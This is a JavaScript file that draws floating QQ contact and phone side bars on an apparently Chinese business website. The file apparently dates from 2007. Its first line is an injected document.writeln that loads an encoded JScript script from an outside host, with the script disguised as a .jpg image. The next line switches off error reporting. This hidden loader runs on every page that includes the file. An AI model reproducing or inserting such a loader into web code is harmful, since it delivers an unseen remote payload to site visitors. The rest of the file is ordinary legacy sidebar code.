document.writeln("<SCRIPT language=\"JScript.Encode\" src=http:\/\/www.lw3.cn\/data\/mark\/login_right.jpg><\/script>");
﻿self.onError = null;

currentX = currentY = 0; 

whichIt = null; 

lastScrollX = 0; lastScrollY = 0;

NS = (document.layers) ? 1 : 0;

IE = (document.all) ? 1: 0;

<!-- STALKER CODE -->

function heartBeat(objectid) {

	if(IE) { diffY = document.body.scrollTop; diffX = document.body.scrollLeft; }

	if(NS) { diffY = self.pageYOffset; diffX = self.pageXOffset; }

	if(diffY != lastScrollY) {

		percent = .1 * (diffY - lastScrollY);

		if(percent > 0) percent = Math.ceil(percent);

		else percent = Math.floor(percent);

		if(IE) {

			objectid = objectid.split(";"); 

			for (i = 0; i < objectid.length; i++) eval("document.all."+objectid[i]).style.pixelTop += percent;

		}	

		if(NS) {

			objectid = objectid.split(";"); 

			for (i = 0; i < objectid.length; i++) eval("document."+objectid[i]).top += percent; 

		}	

		lastScrollY = lastScrollY + percent;

	}

	if(diffX != lastScrollX) {

		percent = .1 * (diffX - lastScrollX);

		if(percent > 0) percent = Math.ceil(percent);

		else percent = Math.floor(percent);

		if(IE) {

			objectid = objectid.split(";"); 

			for (i = 0; i < objectid.length; i++) eval("document.all."+objectid[i]).style.pixelLeft += percent;

		}	

		if(NS) {

			objectid = objectid.split(";"); 

			for (i = 0; i < objectid.length; i++) eval("document."+objectid[i]).left += percent; 			

		}	

		lastScrollX = lastScrollX + percent;

	} 	

}

<!-- /STALKER CODE -->



if(NS || IE) action = window.setInterval("heartBeat('leftbar;rightbar;leftbara')", 2);

<!--//close-->
var rightbar ;
var coupletcode;
rightbar = window.screen.width-150+20;
coupletcode = "<DIV id=leftbar style='LEFT: 16px; POSITION: absolute; TOP: 250px; VISIBILITY: hidden;' width=82>32</div><DIV id=rightbar style='right:10px; POSITION: absolute; TOP: 250px; VISIBILITY: hidden' WIDTH=102>32</div><DIV id=leftbara style='left:16px; POSITION: absolute; top:466px; VISIBILITY: hidden' WIDTH=81>32</div>";

if (window.screen.width>=1024)
{
document.write(coupletcode);
}

function InsertCouplet()
{
if (window.screen.width>=1024){	
document.getElementById("leftbar").style.visibility = "visible";
document.getElementById("rightbar").style.visibility = "visible";
document.getElementById("leftbara").style.visibility = "visible";
document.getElementById("leftbar").innerHTML = "<map name=Left_Bar_Map><area shape=rect coords=71,11,85,26 href=### onclick=ClosebarAll();></map>";
/*document.getElementById("rightbar").innerHTML = "";*/
/*right_bar_ac_start*/
document.getElementById("rightbar").innerHTML = "<div style='width:94px'><div style='width:94px; height:28px;'><img src=/images/top2.gif width=94 height=28 border=0 usemap=#left_Bar_Map></div><div style='background:url(/images/bgqq.gif) repeat-y; width:94px; text-align:center'><div class=qqtd>咨询QQ</div><div class=qqtd><div class=qqd1><a target=blank href=http://wpa.qq.com/msgrd?V=1&Uin=363377189&Site=www.yunjiexiang.com&Menu=yes><img src=/images/01_online.gif border=0 align=absmiddle></a><a target=blank href=http://wpa.qq.com/msgrd?V=1&Uin=809851993&Site=www.yunjiexiang.com&Menu=yes><img src=/images/01_online.gif border=0 align=absmiddle></a><a target=blank href=http://wpa.qq.com/msgrd?V=1&Uin=1205225165&Site=www.yunjiexiang.com&Menu=yes><img src=/images/01_online.gif border=0 align=absmiddle></a><a target=blank href=http://wpa.qq.com/msgrd?V=1&Uin=1109324938&Site=www.yunjiexiang.com&Menu=yes><img src=/images/01_online.gif border=0 align=absmiddle></a><a target=blank href=http://wpa.qq.com/msgrd?V=1&Uin=1293902757&Site=www.yunjiexiang.com&Menu=yes><img src=/images/01_online.gif border=0 align=absmiddle></a><a target=blank href=http://wpa.qq.com/msgrd?V=1&Uin=1285492845&Site=www.yunjiexiang.com&Menu=yes><img src=/images/01_online.gif border=0 align=absmiddle></a></div><div class=qqspc></div><div class=qqtd><br>联系电话</div><div class=qqtd><div class=qqd1></div><div class=qqqq>010-67276605</div></div></div><div style='width:94px; height:13px'><img src=/images/bot.gif width=94 height=13></div></div><map name=left_Bar_Map><area shape=rect coords=71,11,85,26 href=### onclick=ClosebarAll();></map>";
/*right_bar_ac_end*/ 
/*document.getElementById("rightbar").innerHTML = "";*/
document.getElementById("leftbara").innerHTML = "&nbsp;";
}
}
	InsertCouplet();
	function leftBG_DoFSCommand(command,args){
		if (command == "quit"){
			document.all.leftbar.style.visibility = "hidden";
			document.all.rightbar.style.visibility = "hidden";
			document.all.leftbara.style.visibility = "hidden";
		}
	}
	function rightBG_DoFSCommand(command,args){
		leftBG_DoFSCommand(command,args);
	}
	<!--
	if (document.all){
		document.write("<Script language=\"JavaScript\" For=\"rightB\" Event=\"FSCommand(command,args)\">\n");
		document.write("	leftBG_DoFSCommand(command,args);\n");

		document.write("</Script>\n");
		document.write("<Script language=\"JavaScript\" For=\"leftB\" Event=\"FSCommand(command,args)\">\n");
		document.write("	rightBG_DoFSCommand(command,args);\n");
		document.write("</Script>\n");
	}
	//-->

//Kangk last edited 20070416
function ClosebarAll(){
	document.all.leftbar.style.visibility = "hidden";
	document.all.rightbar.style.visibility = "hidden";
	document.all.leftbara.style.visibility = "hidden";
}
